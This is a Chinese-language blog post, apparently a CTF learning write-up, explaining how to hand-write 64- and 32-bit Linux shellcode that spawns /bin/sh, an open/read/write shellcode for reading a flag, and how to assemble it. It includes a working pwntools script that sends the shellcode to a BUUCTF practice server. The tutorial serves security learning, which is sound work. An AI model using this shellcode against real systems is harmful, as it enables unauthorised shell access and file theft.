<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.1.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"wp.zgroot.cn","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="1、什么是shellcode​		这里我谈谈自己的理解，shellcode就是人为编写的一段代码，执行这串代码之后，就可以获取电脑的shell。（这个解释为了方便理解，从而忽略了一部分严谨性（如果想看更严谨的定义的话，可以百度一下），但是初学者去理解shellcode的话，这么理解，应该是没什么问题的）。">
<meta property="og:type" content="article">
<meta property="og:title" content="用汇编语言构造简单的shellcode（64位&amp;&amp;32位）以及将汇编语言转换成机器码的方法">
<meta property="og:url" content="https://wp.zgroot.cn/2022/04/26/shellcode/index.html">
<meta property="og:site_name" content="楼上请让路*">
<meta property="og:description" content="1、什么是shellcode​		这里我谈谈自己的理解，shellcode就是人为编写的一段代码，执行这串代码之后，就可以获取电脑的shell。（这个解释为了方便理解，从而忽略了一部分严谨性（如果想看更严谨的定义的话，可以百度一下），但是初学者去理解shellcode的话，这么理解，应该是没什么问题的）。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://wp.zgroot.cn/upload/img/image-20220411122805282.png">
<meta property="og:image" content="https://wp.zgroot.cn/upload/img/image-20220411122813400.png">
<meta property="og:image" content="https://wp.zgroot.cn/upload/img/image-20220411122822554.png">
<meta property="og:image" content="https://wp.zgroot.cn/upload/img/image-20220411122825848.png">
<meta property="og:image" content="https://wp.zgroot.cn/upload/img/image-20220411122829116.png">
<meta property="og:image" content="https://wp.zgroot.cn/upload/img/image-20220411122834434.png">
<meta property="og:image" content="https://wp.zgroot.cn/upload/img/image-20220411122843798.png">
<meta property="og:image" content="https://wp.zgroot.cn/upload/img/image-20220411122853087.png">
<meta property="og:image" content="https://wp.zgroot.cn/upload/img/image-20220411122904373.png">
<meta property="article:published_time" content="2022-04-26T09:07:30.834Z">
<meta property="article:modified_time" content="2022-04-26T09:07:30.834Z">
<meta property="article:author" content="楼上请让路*">
<meta property="article:tag" content="PWN">
<meta property="article:tag" content="shellcode">
<meta property="article:tag" content="学习总结">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://wp.zgroot.cn/upload/img/image-20220411122805282.png">

<link rel="canonical" href="https://wp.zgroot.cn/2022/04/26/shellcode/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>用汇编语言构造简单的shellcode（64位&&32位）以及将汇编语言转换成机器码的方法 | 楼上请让路*</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">楼上请让路*</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">wp发布</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://wp.zgroot.cn/2022/04/26/shellcode/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/image.png">
      <meta itemprop="name" content="楼上请让路*">
      <meta itemprop="description" content="楼上请让路*的博客">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="楼上请让路*">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          用汇编语言构造简单的shellcode（64位&&32位）以及将汇编语言转换成机器码的方法
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-04-26 09:07:30" itemprop="dateCreated datePublished" datetime="2022-04-26T09:07:30+00:00">2022-04-26</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="1、什么是shellcode"><a href="#1、什么是shellcode" class="headerlink" title="1、什么是shellcode"></a>1、什么是shellcode</h1><p>​		这里我谈谈自己的理解，shellcode就是人为编写的一段代码，执行这串代码之后，就可以获取电脑的shell。（这个解释为了方便理解，从而忽略了一部分严谨性（如果想看更严谨的定义的话，可以百度一下），但是初学者去理解shellcode的话，这么理解，应该是没什么问题的）。</p>
<span id="more"></span>

<h1 id="2、怎么用汇编语言构造简单的shellcode-64位"><a href="#2、怎么用汇编语言构造简单的shellcode-64位" class="headerlink" title="2、怎么用汇编语言构造简单的shellcode(64位)"></a>2、怎么用汇编语言构造简单的shellcode(64位)</h1><p>前置知识：</p>
<p>① 64位寄存器传参的前三个寄存器分别是rdi,rsi,rdx</p>
<p>②64位系统调用号通过查看linux上的&#x2F;usr&#x2F;include&#x2F;x86_64-linux-gnu&#x2F;asm&#x2F;unistd_64.h文件就可以获取</p>
<p>③系统调用号放入rax寄存器，然后syscall就可以执行对应的系统调用函数</p>
<p>​		</p>
<p>​		<strong>首先我们的目的是执行execve(“&#x2F;bin&#x2F;sh”,0,0)。</strong>从而获取shell</p>
<p>​		因此，我们需要干三件事情</p>
<p>​		①因为本来是没有这个execve函数的，但是我们现在要凭空给它造一个，因此这里系统调用execve<strong>（你可以理解为，只要去执行syscall这个指令并且把rax里面装入对应的系统调用号，就可以使用系统调用的任何函数）</strong></p>
<p>​		②将第一个参数存入”&#x2F;bin&#x2F;sh”</p>
<p>​		③将第二个、第三个参.数存入0</p>
<p><strong>我们要做的是在系统调用execve之前，去把需要的参数都存进去。</strong></p>
<p>xor rdx,rdx</p>
<p>xor rsi,rsi  #此时去把rsi，rdx两个寄存器都存成0，至于这里为什么不用mov rdx,0和mov rsi,0。</p>
<p>主要是避免出现00字符来截断，不过话说，据我了解，平常如果是直接读入字符串的话，00也不会产生截断的效果，只有用strcpy这类函数的时候，才考虑00截断。不过那为什么我们平常写shellcode还是要尽量选择xor rsi,rsi而不是mov rsi,0呢，是因为xor rsi,rsi所需要的字节数更少。</p>
<p>这个具体的话，可以参考如下两张图片<br><img src="/upload/img/image-20220411122805282.png" alt="image-20220411122805282" style="zoom:50%;" /></p>
<img src="/upload/img/image-20220411122813400.png" alt="image-20220411122813400" style="zoom:50%;" />


<p>图片出自<a target="_blank" rel="noopener" href="https://xuanxuanblingbling.github.io/ctf/pwn/2020/12/16/input/">CTF中常见的C语言输入函数截断属性总结 | Clang裁缝店 (xuanxuanblingbling.github.io)</a></p>
<p>接着是准备要把第一个参数存入rdi，以前我一直以为是rdi的写成&#x2F;bin&#x2F;sh对应的ascii码，可是现在才明白，<font color=red>我们只是要把&#x2F;bin&#x2F;sh对应的ascii码的*<u><strong>地址</strong></u>*给rdi即可</font>。传参的时候，要调用的函数会自己去这个地址里找到对应的&#x2F;bin&#x2F;sh。</p>
<p>因此这步要写成</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">xor rdi,rdi</span><br><span class="line"></span><br><span class="line">push rdi   #此时的rdi是0，要把这个0压入栈顶，当下面把0x68732f2f6e69622f压入栈顶之后，这个0就起到了截断字符串的作用（用来声明，execve的第一个参数字符串到哪结束）</span><br><span class="line"></span><br><span class="line">mov rdi,0x68732f2f6e69622f  #现在rdi的值是0x68732f2f6e69622f</span><br><span class="line"></span><br><span class="line">push rdi    #此时参数0x68732f2f6e69622f（即/bin//sh)就存在了栈顶的内存单元中</span><br><span class="line"></span><br><span class="line">lea rdi,[rsp]     #等同于mov rdi,rsp  此时是把**栈顶的地址**&lt;u&gt;*（**一定要注意，是栈顶的地址，就是rsp本身的值（rsp本身就是个地址）***&lt;/u&gt;，赋值给rdi，也就是说此时rdi的值就是参数的地址</span><br></pre></td></tr></table></figure>

<p>这里我还是想详细说一下，因为当初我在这里迷了很久。<font color=red>rsp的值和rsp的内容是两码事</font>，你<strong>可以把他们理解成c语言中的指针p和*p的关系</strong>。<u>rsp的值，就是栈顶内存单元的地址；rsp的内容，就是栈顶的内存单元中的内容。此时rsp的内容才是0x68732f2f6e69622f，而现在只是把栈顶的地址赋给了rdi的值</u>。</p>
<p>现在也才是我们要的效果，<font color=red>rdi里面装的是&#x2F;bin&#x2F;&#x2F;sh的地址，而非参数本身</font>。</p>
<p> 这里有两点需要注意：</p>
<p>①这个0x68732f2f6e69622f是&#x2F;bin&#x2F;&#x2F;sh对应的ascii码。<strong>并且他是倒着存的</strong>，因为asm在把我们写的<strong>汇编语言转换成机器码的时候，会因为小端序的原因将输入的内容给倒过来</strong>。别的机器码我们不用担心，<u>但是我们输入的字符串，需要手动先给倒过来一次，这样等到汇编语言转换成机器码的时候，再倒过来一次，程序处理字符串的时候，就会拿到真正的参数&#x2F;bin&#x2F;&#x2F;sh，而非hs&#x2F;&#x2F;nib&#x2F;</u>。</p>
<p>②<strong>0x68732f2f6e69622f中间这里出现了两2f(也就是两个&#x2F;)，因为这里要填充够八个字节（64位程序中，一个内存单元就只能装八个字节）</strong></p>
<p>为了达到上述的效果，我们还可以这么写。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">xor rdi,rdi</span><br><span class="line"></span><br><span class="line">mov rdi,0x68732f6e69622f</span><br><span class="line"></span><br><span class="line">push rdi</span><br><span class="line"></span><br><span class="line">push rsp</span><br><span class="line"></span><br><span class="line">pop rdi</span><br></pre></td></tr></table></figure>
<p>有好几处内容都变了。</p>
<p>首先是原本xor rdi,rdi下面的push rdi没了，咦？难道我们不需要去在栈中存入一个零，以来声明字符串的结束么？我们依然需要一个00来去截断字符串，但是此刻你还会发现0x68732f6e69622f中间的两个2f现在就变成了一个2f（此时参数是&#x2F;bin&#x2F;sh） 难道此时不需要去填充够八字节么。是的不需要了，<font color=red>程序发现了我们这个内存单元的内容不够八字节，它会自己帮我们添加一个00上去以来凑齐八字节，并且这个00同时声明了字符串的结束。</font></p>
<p><strong>因此我们不但不需要push一个0，并且还不用去填充八字节，程序帮我们补的00，正好可以去代替原本应该push的0。（值得一提的是如果我们内存单元只有六个字节，那么程序依然会帮我们补全到八个字节，也就是填充两个字节的00）</strong></p>
<p>最后的变化就是把原本的lea rdi,[rsp]换成了一个push rsp ;pop rdi<strong>（把rsp的值压入栈顶，也就是把rsp的值存入了栈顶内存单元的内容中，再把栈顶的内存单元的内容弹给rdi的值，也就完成了把rsp的值赋给了rdi的值）</strong><u><strong>（在这里一定要区分清楚值与内容的关系）</strong></u>这样做的好处是什么？这样写的字节更少，原本lea rdi,[rsp]是四个字节<br><img src="/upload/img/image-20220411122822554.png" alt="image-20220411122822554"></p>
<p>即使换成mov rdi,rsp<br><img src="/upload/img/image-20220411122825848.png" alt="image-20220411122825848"></p>
<p>也还是三个字节。但是我们为了达到同样的效果，使用push rsp;pop rdi两个指令，一共也才两个字节。<br><img src="/upload/img/image-20220411122829116.png" alt="image-20220411122829116"></p>
<p>因为很多有难度的题目都会限制shellcode的长度，<em>因此我们所选的shellcode，是越短越好。</em></p>
<p>最后，就是将execve对应的系统调用号放入rax中，然后syscall即可</p>
<p>那剩下的汇编就是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">xor rax,rax</span><br><span class="line"></span><br><span class="line">mov rax,0x3b</span><br><span class="line"></span><br><span class="line">syscall</span><br></pre></td></tr></table></figure>


<p>然后把刚才所写的三部分汇总一下并且精简一下最后仅仅用了0x1e个字节。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">xor rax,rax</span><br><span class="line">push 0x3b</span><br><span class="line">pop rax</span><br><span class="line">xor rdi,rdi</span><br><span class="line">mov rdi ,0x68732f6e69622f</span><br><span class="line">push rdi</span><br><span class="line">push rsp</span><br><span class="line">pop rdi</span><br><span class="line">xor rsi,rsi</span><br><span class="line">xor rdx,rdx</span><br><span class="line">syscall</span><br></pre></td></tr></table></figure>
<img src="/upload/img/image-20220411122834434.png" alt="image-20220411122834434" style="zoom:50%;" />

<p>此时只要执行这个shellcode，就可以去拿到shell了。这里拿一道BUUCTF上的mrctf2020_shellcode来演示一下。题目链接<a target="_blank" rel="noopener" href="https://buuoj.cn/challenges#mrctf2020_shellcode">BUUCTF在线评测 (buuoj.cn)</a></p>
<p>使用IDA分析之后（这道题无法F5，不过可以看汇编来分析），发现我们输入的内容直接就被执行了，因此什么都不用考虑，这道题仅仅就是考察我们64位汇编编写shellcode的能力。利用pwntools中的asm把刚才写好的汇编内容转换成机器码，然后发送过去即可获取shell。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">27143</span>)</span><br><span class="line">context(arch=<span class="string">&#x27;amd64&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">shellcode=asm(<span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">xor rax,rax</span></span><br><span class="line"><span class="string">push 0x3b</span></span><br><span class="line"><span class="string">pop rax</span></span><br><span class="line"><span class="string">xor rdi,rdi</span></span><br><span class="line"><span class="string">mov rdi,0x68732f6e69622f</span></span><br><span class="line"><span class="string">push rdi</span></span><br><span class="line"><span class="string">push rsp</span></span><br><span class="line"><span class="string">pop rdi</span></span><br><span class="line"><span class="string">xor rsi,rsi</span></span><br><span class="line"><span class="string">xor rdx,rdx</span></span><br><span class="line"><span class="string">syscall</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span>)</span><br><span class="line">p.sendline(shellcode)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="3、怎么用汇编语言构造简单的shellcode（32位）"><a href="#3、怎么用汇编语言构造简单的shellcode（32位）" class="headerlink" title="3、怎么用汇编语言构造简单的shellcode（32位）"></a>3、怎么用汇编语言构造简单的shellcode（32位）</h1><p>前置知识：</p>
<p>①对于32位程序而言，我们最后系统调用采用的并不是syscall，而是int 0x80</p>
<p>②我们传参的前三个寄存器分别是ebx,ecx,edx</p>
<p>③32位的execve系统调用号是11，并且存储系统调用后的寄存器是eax。32位的系统调用号可以查看这个文件&#x2F;usr&#x2F;include&#x2F;x86_64-linux-gnu&#x2F;asm&#x2F;unistd_32.h</p>
<p>然后剩下的思路是和64位汇编构造shellcode的思路是一样的。</p>
<p>首先是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">xor ecx,ecx</span><br><span class="line">xor edx,edx</span><br></pre></td></tr></table></figure>

<p>清空两个参数为0的寄存器</p>
<p>然后是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">xor ebx,ebx </span><br><span class="line">push ebx</span><br><span class="line">push 0x68732f2f</span><br><span class="line">push 0x6e69622f</span><br><span class="line">mov ebx,esp</span><br></pre></td></tr></table></figure>

<p>此时把参数&#x2F;bin&#x2F;sh压入栈，最开始push ebx是先压入栈中一个0，用来字符串截断。最后将esp指向的地址赋给了ebx，此时ebx的值就是&#x2F;bin&#x2F;sh的地址。</p>
<img src="/upload/img/image-20220411122843798.png" alt="image-20220411122843798" style="zoom:33%;" />

<p>此时栈中的情况就是这样，&#x2F;bin&#x2F;sh与&#x2F;bin&#x2F;&#x2F;sh的效果一样，至于为什么要存入字符串的时候，要反着写，在64位汇编编写shellcode的时候，已经解释过了，这里就不再重复。</p>
<p>最后是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">xor eax,eax</span><br><span class="line">push 11</span><br><span class="line">pop eax</span><br><span class="line">int 0x80</span><br></pre></td></tr></table></figure>

<p>现在是把系统调用号存进去并且进行了系统调用</p>
<p>最后把这三部分结合一下效果如下。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">xor ecx,ecx</span><br><span class="line">xor edx,edx</span><br><span class="line">xor ebx,ebx </span><br><span class="line">push ebx</span><br><span class="line">push 0x68732f2f</span><br><span class="line">push 0x6e69622f</span><br><span class="line">mov ebx,esp</span><br><span class="line">xor eax,eax</span><br><span class="line">push 11</span><br><span class="line">pop eax</span><br><span class="line">int 0x80</span><br></pre></td></tr></table></figure>

<h1 id="4、手写open，read，write的shellcode"><a href="#4、手写open，read，write的shellcode" class="headerlink" title="4、手写open，read，write的shellcode"></a>4、手写open，read，write的shellcode</h1><p>遇见pwn题开启了沙箱保护的话，如果禁用了execve、system函数，但没有开启NX保护的话，可以采用orw的方式来读出flag。</p>
<p>首先我们要执行的如下的代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">open</span>(flag_addr,<span class="number">0</span>)</span><br><span class="line">read(<span class="number">3</span>,addr,<span class="number">0x50</span>)<span class="comment">#第一个参数是3，因为一个进程有默认的文件描述符0,1,2。当再打开新的文件之后，文件描述符就会以此类推的分配，因此上面open新打开的flag文件的文件描述符就是3</span></span><br><span class="line"><span class="comment">#至于这个addr，把读出来的flag放到哪，一会再说</span></span><br><span class="line">write(<span class="number">1</span>,addr,<span class="number">0x50</span>)</span><br></pre></td></tr></table></figure>

<p>接下来，就开始用汇编来实现上面的内容。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">open(flag_addr,0)</span><br><span class="line">push 0x67616c66</span><br><span class="line">push rsp</span><br><span class="line">pop rdi</span><br><span class="line">#上面这两步就是在传open的第一个参数，这个参数要是一个地址，这个地址要指向字符串&#x27;flag&#x27;</span><br><span class="line">#执行完push 0x67616c66的时候，栈顶的内容就是字符串flag，而栈顶指针rsp就指向了这个flag，</span><br><span class="line">#此时执行push rsp将指向flag的地址（也就是rsp）压栈，此时栈顶的内容就是那个指向flag的地址，然后再执行pop rdi</span><br><span class="line">#将栈顶的这个内容弹给rdi，此时open的第一个参数就成为了指向flag的地址</span><br><span class="line">push 0</span><br><span class="line">pop rsi</span><br><span class="line">push 2</span><br><span class="line">pop rax</span><br><span class="line">syscall</span><br><span class="line"></span><br><span class="line">read(3,addr,0x50)</span><br><span class="line">push 3</span><br><span class="line">pop rdi</span><br><span class="line">push rsp </span><br><span class="line">pop rsi</span><br><span class="line">#上面这两步在完成read函数的第二个参数传参，此时压入栈的rsp，我并不知道这个地址是什么</span><br><span class="line">#只知道把这个地址给rsi的话，flag就会被写到这个地址里面，至于这个地址是什么，真的不重要</span><br><span class="line">#重要的是要保证接下来write的第二个参数也是这个地址即可，而我们要做的就是保证接下来的</span><br><span class="line">#每一个push都要对应一个pop，这样栈顶始终就是给当初rsi的那个地址了。</span><br><span class="line">push 0x50</span><br><span class="line">pop rdx</span><br><span class="line">push 0</span><br><span class="line">pop rax</span><br><span class="line">syscall</span><br><span class="line"></span><br><span class="line">write(1,addr,0x50)</span><br><span class="line">push 1</span><br><span class="line">pop rdi</span><br><span class="line">push rsp</span><br><span class="line">pop rsi</span><br><span class="line">#这个地方的push rsp pop rsi原理同上</span><br><span class="line">push 0x50</span><br><span class="line">pop rdx</span><br><span class="line">push 1</span><br><span class="line">pop rax</span><br><span class="line">syscall</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="5、怎么将自己写好的汇编语言转换成机器码。"><a href="#5、怎么将自己写好的汇编语言转换成机器码。" class="headerlink" title="5、怎么将自己写好的汇编语言转换成机器码。"></a>5、怎么将自己写好的汇编语言转换成机器码。</h1><p>上面介绍了用asm将汇编语言转换成机器码（这个方法主要是检查编写的汇编语言没问题之后，再去写exp的时候直接用asm转换了），下面换一种方式来转换。（这个方法主要可以用于平常的调试，以及测试使用）</p>
<p>先用touch shellcode.asm  命令创建一个shellcode.asm文件</p>
<p>然后vim shellcode.asm  去编辑这个文件</p>
<p>将汇编的内容写入这个文件里面。</p>
<p>（同时在文件的开头写上下面三行的内容，其作用可以自行参考<a target="_blank" rel="noopener" href="https://www.cnblogs.com/lazypigwhy/articles/14112041.html">【转】linux汇编.section .text .data 与.global - 比较懒 - 博客园 (cnblogs.com)</a></p>
<p>section .text<br>global _start<br>_start:</p>
<p>最后的写入的内容应该是</p>
<img src="/upload/img/image-20220411122853087.png" alt="image-20220411122853087" style="zoom: 50%;" />




<p>然后用nasm -f elf64 shellcode.asm这个命令去编译刚才写的那个文件</p>
<p>编译成功之后，会自动生成一个shellcode.o  然后去objdump -d shellcode.o查看对应生成的机器码即可</p>
<img src="/upload/img/image-20220411122904373.png" alt="image-20220411122904373" style="zoom:50%;" />

<p>最后左侧就生成了对应的机器码。平常如果想查看自己的shellcode里面有没有出现00字符，就可以用这个方法来查看，或是想知道某一条指令的字节数，也可以通过这个方法查看。</p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>楼上请让路*
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://wp.zgroot.cn/2022/04/26/shellcode/" title="用汇编语言构造简单的shellcode（64位&amp;&amp;32位）以及将汇编语言转换成机器码的方法">https://wp.zgroot.cn/2022/04/26/shellcode/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-CN" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/PWN/" rel="tag"># PWN</a>
              <a href="/tags/shellcode/" rel="tag"># shellcode</a>
              <a href="/tags/%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/" rel="tag"># 学习总结</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/04/26/srop/" rel="prev" title="关于学习SROP的总结">
      <i class="fa fa-chevron-left"></i> 关于学习SROP的总结
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/04/26/ret2syscall/" rel="next" title="ret2syscall的做题思路（以32位程序为例）">
      ret2syscall的做题思路（以32位程序为例） <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
